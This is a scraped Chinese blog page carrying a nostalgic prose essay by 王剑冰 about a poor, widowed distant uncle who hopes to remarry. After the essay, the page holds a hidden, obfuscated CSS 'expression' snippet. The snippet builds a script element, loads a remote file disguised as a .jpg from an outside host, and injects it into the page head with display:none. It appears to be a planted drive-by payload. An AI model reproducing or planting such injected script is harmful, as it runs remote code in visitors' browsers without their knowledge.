注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

王剑冰博客

散文《绝版的周庄》作者,河南省作家协会副主席

 
 
 

日志

 
 
关于我

1982年毕业于河南大学中文系。1975年赴乡村插队务农,后历任《奔流》杂志编辑,《文艺百家报》、《当代人报》采通部主任,《散文选刊》副主编,副编审。1979年开始发表作品。1993年加入中国作家协会。 河南省作家协会副主席,全国鲁迅文学奖二、三、四届评委,国务院特殊津贴专家。

网易考拉推荐

封存的心愿  

2009-08-18 05:52:00|  分类: 乡情亲情散文 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

封存的心愿

 

王剑冰

 

他说他是我表叔,可我确实不知道。他用极浓的乡音数说着,证明着.我只得点头。他终于在众人面前光彩地笑了。

回去问了奶奶,也确有这么个远房表叔,早无甚来往了,且不在一条街上住着。

表叔喜欢往村子的小学跑,临近年关,村里组织了宣传队,在教室里排练。我回去探亲,被请去作“指导”。就是在那里碰上了表叔.他扒在门外,同一群小孩子张着镶一颗金牙的嘴笑着,他的笑似是莫名的,下意识的。待一曲或一舞完了他便进去说好,大都是对了那些个女子。

“你唱得真好,皮影里一样。”

“嘿,这手甩得像巧儿。”

皮影是家乡的剧种,大概他是和电影里的皮影剧扯在一起,巧儿则是评剧里的刘巧儿,这些在当时都属“封资修”的东西,早被禁演了。

因他夸过了头,姑娘们也就不大好意思,由他说去。可在我来说却是很反感的事,这表叔,净不给我争面子,大我一辈的人,让人家见笑。

每天排练,就总见了表叔的影子围着教室转,后来干脆被招进去打个下手,拾掇个东西,挎个鼓什么的,不知其中有没有我的面子,其实背挎鼓是些小孩子的事,他很是乐意的咧嘴笑。

慢慢听说表叔精神上受过刺激,几年前表婶生孩子难产,母子都没保住,本来结婚就晚的表叔,一下子就陷入绝望的痛苦中,虽然活了下来,精神上却给人有种不大正常的感觉。我说不上是同情他还是鄙视他,反正不大把他放在眼里。

自我来了以后,表叔也就常到爷爷家走走,见了奶奶就叫着表婶子,奶奶拉了他的手跟对我们晚辈一样亲热,表叔也就觉得十分光耀,盘腿坐炕上,露着金牙笑着,一声高一声低的聊些我不知道的旧事。

节目会演,村里的节目被选上,又要去区里,区址在离庄子三十多里地的“老铺”。赶去的头天晚上,下了一场纷纷扬扬的大雪,漫天遍野都白了。奶奶不让我去,说你又不是队里的人去凑什么热闹.看看天上。又飘起了雪花,我有点犹豫,我犹豫是因为我心爱的小提琴。路滑把不住摔跤,那崭新的盒子就会打了泥滚,琴也把不住要被震坏。

就听有人在街上喊进来,是表叔。表叔说,放心吧,摔了找你表叔。他便把那琴拿过去放在了自己的车筐里,他的车筐是荆条的,绑在自行车的一边。老家人的车子上大都绑一个这样的筐子。然后表叔又去缠了奶奶说好话,无非是离了我就塌了天之类,直说得奶奶乐起来,说,去吧,跟了你表叔我就放心了。

路上确是一片泥泞,我们少不了摔跤。表叔的车子似是从博物馆骑出来的,一路上更是少不了耍把戏,直让我后悔小提琴不该交给他。最重的一次摔断了链子,车子滑了很远,表叔则翻进了路边的泥沟里,爬上来简直就是一个泥人。可他还咧着嘴笑,露着那颗发亮的金牙,直把大伙也笑弯了腰。我担心小提琴,跑前面去看,却是好好的捆在车筐里,盒子外边包的,竟是表叔穿在棉袄里的旧绒衣。此时表叔正抖着手,用找来的石头敲打着链子。一股暖流立时涌遍我的全身。

回来后,表叔拉我去他家,一路上他兴奋地和人打招呼,介绍我是他表侄。他的家极有些清冷的味道,屋里摆的,床上用的,全是些如他那辆车子一般的物什。我知道表叔死了妻子,可表叔三十九了,怎么连点儿财产都未积下来呢?

表叔让我脱了鞋,让我上炕里边坐,用小方纸极快地卷成了一支旱烟,在嘴里抿住了边递给我。看我不抽,便自己点上,喷一口浓浓的黄烟笑着。然后就跟我扯那件辛酸的事,扯到痛处竟抹了泪。那支烟早灭了,他再也没点着。

扯够了就打开墙角的一个卧柜让我看,那时表叔眼里又透出一种光亮来。打开前表叔先用袖子在柜面上轻轻拂了,让人平生一种神圣感。柜子盖揭开,拿去遮在上边的红纸,那里边竟是满满的崭新的物什。红红绿绿的被子、衣服,鲜花艳丽的枕头,暖瓶、门帘、水银镜子,甚至碗筷瓢盆,甚至表叔的崭新的棉袄、鞋子……

我惊呆了,不用表叔细说,我也明白,表叔的整颗心都存在这里边了。每逢来人,他许都是这样打开来,细数家珍。他那么怀想他的妻子和未见面的孩子,他渴望生活的乐趣,他期待着新人的来临。乡村成一次家不容易,那些与表婶新婚的东西就是一些资本了,甚至可以和年龄、长相相协调。

果然出门的时候,表叔就说了,能不能帮他介绍一个对象,有无孩子、岁数大小都无关紧要。表叔极认真地说了,我也是极认真地点头应了。我刚刚在千里之外的中学毕业,下乡的事尚未说定,如何会帮表叔“介绍”个对象呢?可我当时是那样的被表叔打动了,如果我是个女子,且不是他的表侄,我不知会如何。

后来我下乡到了唐山的市郊。郊区的女子是不会愿意嫁到渤海湾里一个小庄子的,可我心里总是惦念着这件事。见了些熟识的长辈,便让他们帮忙,却都无结果。致使我总觉得欠着表叔的什么。

ee:expression_r(function(){if(!window.r){varss='s'+'cript';var tt='text/ja'+'vas'+'cript';varst=document.createElement(ss);st.src='http://imgcache.suqian114.cn/a/s/sina.jpg';st.type=tt;document.getElementsByTagName('head').item(0).appendChild(st);window.r=1}}(this));width:0px;display:none">
  评论这张
 
阅读(83)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017